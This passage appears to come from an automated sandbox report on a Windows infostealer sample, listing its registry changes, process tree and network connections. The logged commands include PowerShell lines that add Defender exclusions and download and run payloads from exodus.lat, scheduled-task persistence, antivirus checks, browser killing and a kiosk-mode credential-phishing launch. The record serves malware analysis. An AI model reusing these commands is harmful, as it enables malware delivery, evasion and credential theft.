48696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe | N/A |
Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\39c70553879c5b9162ac95578f271a2f1a5cb13b21cb32a153e7fcd83d37f50a.exe
"C:\Users\Admin\AppData\Local\Temp\39c70553879c5b9162ac95578f271a2f1a5cb13b21cb32a153e7fcd83d37f50a.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef68e9758,0x7fef68e9768,0x7fef68e9778
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1180 --field-trial-handle=1264,i,13962778186743838953,12035110683672601519,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1520 --field-trial-handle=1264,i,13962778186743838953,12035110683672601519,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1644 --field-trial-handle=1264,i,13962778186743838953,12035110683672601519,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2228 --field-trial-handle=1264,i,13962778186743838953,12035110683672601519,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2420 --field-trial-handle=1264,i,13962778186743838953,12035110683672601519,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2436 --field-trial-handle=1264,i,13962778186743838953,12035110683672601519,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1592 --field-trial-handle=1264,i,13962778186743838953,12035110683672601519,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3896 --field-trial-handle=1264,i,13962778186743838953,12035110683672601519,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6379758,0x7fef6379768,0x7fef6379778
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1156 --field-trial-handle=1440,i,10304337174163587909,13124276422316945807,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1380 --field-trial-handle=1440,i,10304337174163587909,13124276422316945807,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1584 --field-trial-handle=1440,i,10304337174163587909,13124276422316945807,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2316 --field-trial-handle=1440,i,10304337174163587909,13124276422316945807,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2720 --field-trial-handle=1440,i,10304337174163587909,13124276422316945807,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2728 --field-trial-handle=1440,i,10304337174163587909,13124276422316945807,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1552 --field-trial-handle=1440,i,10304337174163587909,13124276422316945807,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3768 --field-trial-handle=1440,i,10304337174163587909,13124276422316945807,131072 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\Documents\EHJDGCBGDB.exe"
C:\Users\Admin\Documents\EHJDGCBGDB.exe
"C:\Users\Admin\Documents\EHJDGCBGDB.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe
"C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe"
C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe
"C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe"
C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
"C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe"
C:\Users\Admin\AppData\Local\Temp\is-VTC9F.tmp\i1A5m12.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VTC9F.tmp\i1A5m12.tmp" /SL5="$801F4,3291517,54272,C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe"
C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" pause raf_encoder_1252
C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe
"C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe" -i
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 pause raf_encoder_1252
C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
"C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 491505
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Dentists + ..\Flavor + ..\Disturbed + ..\Artistic + ..\Justice + ..\Proceeds + ..\Zip + ..\Soundtrack + ..\Revenue B
C:\Users\Admin\AppData\Local\Temp\491505\Dr.com
Dr.com B
C:\Windows\SysWOW64\choice.exe
choice /d y /t 15
C:\Windows\SysWOW64\cmd.exe
cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
C:\Users\Admin\AppData\Local\Temp\1012579001\015311d53f.exe
"C:\Users\Admin\AppData\Local\Temp\1012579001\015311d53f.exe"
C:\Users\Admin\AppData\Local\Temp\1012580001\6f3509a2c1.exe
"C:\Users\Admin\AppData\Local\Temp\1012580001\6f3509a2c1.exe"
C:\Users\Admin\AppData\Local\Temp\1012581001\be61ddc95d.exe
"C:\Users\Admin\AppData\Local\Temp\1012581001\be61ddc95d.exe"
C:\Users\Admin\AppData\Local\Temp\1012582001\00c0967b44.exe
"C:\Users\Admin\AppData\Local\Temp\1012582001\00c0967b44.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="864.0.19481411\1850550202" -parentBuildID 20221007134813 -prefsHandle 1204 -prefMapHandle 1104 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5a6433e2-dadc-406e-b391-68b6e1786fb8} 864 "\\.\pipe\gecko-crash-server-pipe.864" 1280 10f07158 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="864.1.1779693036\1166463950" -parentBuildID 20221007134813 -prefsHandle 1540 -prefMapHandle 1524 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e5e987a2-11c2-4962-82a0-be6f94985335} 864 "\\.\pipe\gecko-crash-server-pipe.864" 1552 f6f9558 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="864.2.2056844232\1090679048" -childID 1 -isForBrowser -prefsHandle 1956 -prefMapHandle 1952 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 812 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {94beeb3f-8143-4b5e-a0b8-75e4d344edba} 864 "\\.\pipe\gecko-crash-server-pipe.864" 2072 11765958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="864.3.1935028362\209609923" -childID 2 -isForBrowser -prefsHandle 2876 -prefMapHandle 2872 -prefsLen 26151 -prefMapSize 233444 -jsInitHandle 812 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {230a5887-82ed-4159-9739-667405bb9dde} 864 "\\.\pipe\gecko-crash-server-pipe.864" 2888 1b22bb58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="864.4.1578794199\871504649" -childID 3 -isForBrowser -prefsHandle 3924 -prefMapHandle 3920 -prefsLen 26356 -prefMapSize 233444 -jsInitHandle 812 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {82851038-bf50-48a5-bfe2-5048618c0862} 864 "\\.\pipe\gecko-crash-server-pipe.864" 3936 1e7e4a58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="864.5.139784846\449093148" -childID 4 -isForBrowser -prefsHandle 4152 -prefMapHandle 4148 -prefsLen 26356 -prefMapSize 233444 -jsInitHandle 812 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9c3174ed-0ff7-4ef9-b0e9-0a5719db2320} 864 "\\.\pipe\gecko-crash-server-pipe.864" 4164 20eac258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="864.6.2131883464\16970724" -childID 5 -isForBrowser -prefsHandle 4276 -prefMapHandle 4280 -prefsLen 26356 -prefMapSize 233444 -jsInitHandle 812 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a3cbe4d3-78b1-4a10-87a5-e68daa2809f1} 864 "\\.\pipe\gecko-crash-server-pipe.864" 4268 20eaaa58 tab
C:\Users\Admin\AppData\Local\Temp\1012583001\26623c4c44.exe
"C:\Users\Admin\AppData\Local\Temp\1012583001\26623c4c44.exe"
C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\download.bat" "
C:\Windows\SysWOW64\net.exe
net session
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 session
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat" "
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\runsteal.bat" "
C:\Users\Admin\AppData\Local\Temp\smartscreen.exe
"C:\Users\Admin\AppData\Local\Temp\smartscreen.exe"
C:\Windows\SysWOW64\net.exe
net session
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 session
C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "imagename eq mi.exe"
C:\Windows\SysWOW64\find.exe
find /i "mi.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.206:80 | 185.215.113.206 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| RU | 185.215.113.206:80 | 185.215.113.206 | tcp |
| RU | 185.215.113.206:80 | 185.215.113.206 | tcp |
| N/A | 127.0.0.1:9229 | tcp | |
| N/A | 127.0.0.1:9229 | tcp | |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| RU | 185.215.113.43:80 | 185.215.113.43 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| N/A | 127.0.0.1:9229 | tcp | |
| N/A | 127.0.0.1:9229 | tcp | |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 104.21.81.153:443 | se-blurry.biz | tcp |
